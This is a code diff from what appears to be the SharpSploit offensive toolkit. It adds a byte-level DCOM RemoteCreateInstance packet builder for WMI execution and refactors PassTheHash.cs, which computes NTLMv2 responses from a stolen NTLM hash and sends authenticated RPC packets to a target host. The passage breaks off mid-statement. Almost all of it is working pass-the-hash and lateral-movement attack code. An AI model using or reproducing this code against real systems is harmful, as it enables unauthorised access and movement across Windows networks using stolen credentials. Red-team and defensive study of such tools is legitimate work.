+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPrivateHeader", new byte[] { 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesSessionID", new byte[] { 0xff, 0xff, 0xff, 0xff });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesRemoteThisSessionID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesClientImpersonating", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPartitionIDPresent", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesDefaultAuthnLevel", new byte[] { 0x02, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPartitionGuid", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesProcessRequestFlags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesOriginalClassContext", new byte[] { 0x14, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesFlags", new byte[] { 0x02, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesReserved", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesUnusedBuffer", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoPrivateHeader", new byte[] { 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInstantiatedObjectClsId", new byte[] { 0x5e, 0xf0, 0xc3, 0x8b, 0x6b, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoClassContext", new byte[] { 0x14, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoActivationFlags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoFlagsSurrogate", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInterfaceIdCount", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInstantiationFlag", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsPtr", new byte[] { 0x00, 0x00, 0x02, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationEntirePropertySize", new byte[] { 0x58, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationVersionMajor", new byte[] { 0x05, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationVersionMinor", new byte[] { 0x07, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsPtrMaxCount", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIds", new byte[] { 0x18, 0xad, 0x09, 0xf3, 0x6a, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsUnusedBuffer", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoPrivateHeader", new byte[] { 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientOk", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved3", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoNULLPtr", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextUnknown", new byte[] { 0x60, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextCntData", new byte[] { 0x60, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFSignature", new byte[] { 0x4d, 0x45, 0x4f, 0x57 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFFlags", new byte[] { 0x04, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFIID", new byte[] { 0xc0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFCLSID", new byte[] { 0x3b, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFCBExtension", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFSize", new byte[] { 0x30, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoUnusedBuffer", new byte[] { 0x01, 0x00, 0x01, 0x00, 0x63, 0x2c, 0x80, 0x2a, 0xa5, 0xd2, 0xaf, 0xdd, 0x4d, 0xc4, 0xbb, 0x37, 0x4d, 0x37, 0x76, 0xd7, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoPrivateHeader", packet_private_header);
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoAuthenticationFlags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoNULLPtr", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoReserved", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameReferentID", new byte[] { 0x04, 0x00, 0x02, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNULLPtr", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoReserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameMaxCount", packet_target_length);
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameActualCount", packet_target_length);
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameString", packet_target_unicode);
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoPrivateHeader", new byte[] { 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoNULLPtr", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoProcessID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoApartmentID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoContextID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoPrivateHeader", new byte[] { 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoNULLPtr", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestClientImpersonationLevel", new byte[] { 0x02, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestNumProtocolSequences", new byte[] { 0x01, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestUnknown", new byte[] { 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrReferentID", new byte[] { 0x04, 0x00, 0x02, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrMaxCount", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrProtocolSeq", new byte[] { 0x07, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoUnusedBuffer", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            return packet_DCOMRemoteCreateInstance;
+        }
+    }
+}
+

--- a/SharpSploit/LateralMovement/PassTheHash.cs
+++ b/SharpSploit/LateralMovement/PassTheHash.cs
@@ -262,53 +262,55 @@ namespace SharpSploit.LateralMovement
                     string username_and_target = username.ToUpper();
                     byte[] username_bytes = Encoding.Unicode.GetBytes(username_and_target);
                     byte[] username_and_target_bytes = null;
-                    username_and_target_bytes = Utilities.CombineByteArray(username_bytes, auth_domain_bytes);
+                    username_and_target_bytes = username_bytes.Concat(auth_domain_bytes).ToArray<byte>();
                     byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(username_and_target_bytes);
                     Random r = new Random();
                     byte[] client_challenge_bytes = new byte[8];
                     r.NextBytes(client_challenge_bytes);
-                    byte[] security_blob_bytes = null;
-                    security_blob_bytes = Utilities.CombineByteArray(new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, WMI_target_time_bytes);
-                    security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, client_challenge_bytes);
-                    security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
-                    security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, WMI_target_details);
-                    security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
-                    byte[] server_challenge_and_security_blob_bytes = Utilities.CombineByteArray(WMI_NTLM_challenge, security_blob_bytes);
+                    byte[] security_blob_bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                        .Concat(WMI_target_time_bytes)
+                        .Concat(client_challenge_bytes)
+                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
+                        .Concat(WMI_target_details)
+                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                    
+                    byte[] server_challenge_and_security_blob_bytes = WMI_NTLM_challenge.Concat(security_blob_bytes).ToArray();
                     HMAC_MD5.Key = NTLMv2_hash;
                     byte[] NTLMv2_response = HMAC_MD5.ComputeHash(server_challenge_and_security_blob_bytes);
                     byte[] session_base_key = HMAC_MD5.ComputeHash(NTLMv2_response);
-                    NTLMv2_response = Utilities.CombineByteArray(NTLMv2_response, security_blob_bytes);
+                    NTLMv2_response = NTLMv2_response.Concat(security_blob_bytes).ToArray();
                     byte[] NTLMv2_response_length = BitConverter.GetBytes(NTLMv2_response.Length);
                     NTLMv2_response_length = new byte[] { NTLMv2_response_length[0], NTLMv2_response_length[1] };
                     byte[] WMI_session_key_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + NTLMv2_response.Length + 88);
                     byte[] WMI_session_key_length = new byte[] { 0x00, 0x00 };
                     byte[] WMI_negotiate_flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 };
-                    byte[] NTLMSSP_response = null;
-                    NTLMSSP_response = Utilities.CombineByteArray(new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 }, auth_LM_offset);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_NTLM_offset);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_offset);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_offset);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_offset);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_length);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_length);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_offset);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_negotiate_flags);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_bytes);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_bytes);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_bytes);
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
-                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response);
+                    
+                    byte[] NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 })
+                        .Concat(auth_LM_offset)
+                        .Concat(NTLMv2_response_length)
+                        .Concat(NTLMv2_response_length)
+                        .Concat(auth_NTLM_offset)
+                        .Concat(auth_domain_length)
+                        .Concat(auth_domain_length)
+                        .Concat(auth_domain_offset)
+                        .Concat(auth_username_length)
+                        .Concat(auth_username_length)
+                        .Concat(auth_username_offset)
+                        .Concat(auth_hostname_length)
+                        .Concat(auth_hostname_length)
+                        .Concat(auth_hostname_offset)
+                        .Concat(WMI_session_key_length)
+                        .Concat(WMI_session_key_length)
+                        .Concat(WMI_session_key_offset)
+                        .Concat(WMI_negotiate_flags)
+                        .Concat(auth_domain_bytes)
+                        .Concat(auth_username_bytes)
+                        .Concat(auth_hostname_bytes)
+                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                        .Concat(NTLMv2_response).ToArray();
+
                     assoc_group = Utilities.GetByteRange(WMI_client_receive, 20, 23);
                     packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response);
-                    //WMI_client_receive = WMISend(WMI_client_stream, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
                     WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC);
                     WMI_client_stream.Write(WMI_client_send, 0, WMI_client_send.Length);
                     WMI_client_stream.Flush();
@@ -317,7 +319,7 @@ namespace SharpSploit.LateralMovement
                     OrderedDictionary packet_DCOM_remote_create_instance = WMIExec.DCOMRemoteCreateInstance(causality_ID_bytes, target_short);
                     byte[] DCOM_remote_create_instance = Utilities.ConvertFromPacketOrderedDictionary(packet_DCOM_remote_create_instance);
                     packet_RPC = WMIExec.RPCRequest(new byte[] { 0x03 }, DCOM_remote_create_instance.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x01, 0x00 }, new byte[] { 0x04, 0x00 }, null);
-                    WMI_client_send = Utilities.CombineByteArray(Utilities.ConvertFromPacketOrderedDictionary(packet_RPC), DCOM_remote_create_instance);
+                    WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC).Concat(DCOM_remote_create_instance).ToArray();
                     WMI_client_receive = SendStream(WMI_client_stream, WMI_client_send);
                     TcpClient WMI_client_random_port = new TcpClient();
                     WMI_client_random_port.Client.ReceiveTimeout = 30000;
@@ -348,7 +350,7 @@ namespace SharpSploit.LateralMovement
                         {
                             target_short = auth_hostname;
                         }
-                        byte[] target_unicode = Utilities.CombineByteArray(new byte[] { 0x07, 0x00 }, Encoding.Unicode.GetBytes(target_short + "["));
+                        byte[] target_unicode = (new byte[] { 0x07, 0x00 }).Concat(Encoding.Unicode.GetBytes(target_short + "[")).ToArray();
                         string target_search = BitConverter.ToString(target_unicode).Replace("-", "");
                         string WMI_message = BitConverter.ToString(WMI_client_receive).Replace("-", "");
                         int target_index = WMI_message.IndexOf(target_search);
@@ -359,7 +361,6 @@ namespace SharpSploit.LateralMovement
                             foreach (IPAddress ip in target_address_list)
                             {
                                 target_short = ip.Address.ToString();
-                                target_unicode = Utilities.CombineByteArray(new byte[] { 0x07, 0x00 }, Encoding.Unicode.GetBytes(target_short + "["));
                                 target_search = BitConverter.ToString(target_unicode).Replace("-", "");
                                 target_index = WMI_message.IndexOf(target_search);
 
@@ -461,53 +462,56 @@ namespace SharpSploit.LateralMovement
                         HMAC_MD5.Key = NTLM_hash_bytes;
                         username_and_target = username.ToUpper();
                         username_bytes = Encoding.Unicode.GetBytes(username_and_target);
-                        username_and_target_bytes = Utilities.CombineByteArray(username_bytes, auth_domain_bytes);
+                        username_and_target_bytes = username_bytes.Concat(auth_domain_bytes).ToArray();
                         NTLMv2_hash = HMAC_MD5.ComputeHash(username_and_target_bytes);
                         r = new Random();
                         client_challenge_bytes = new byte[8];
                         r.NextBytes(client_challenge_bytes);
-                        security_blob_bytes = null;
-                        security_blob_bytes = Utilities.CombineByteArray(new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, WMI_target_time_bytes);
-                        security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, client_challenge_bytes);
-                        security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
-                        security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, WMI_target_details);
-                        security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
-                        server_challenge_and_security_blob_bytes = Utilities.CombineByteArray(WMI_NTLM_challenge, security_blob_bytes);
+                        
+                        security_blob_bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                        .Concat(WMI_target_time_bytes)
+                        .Concat(client_challenge_bytes)
+                        .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
+                        .Concat(WMI_target_details)
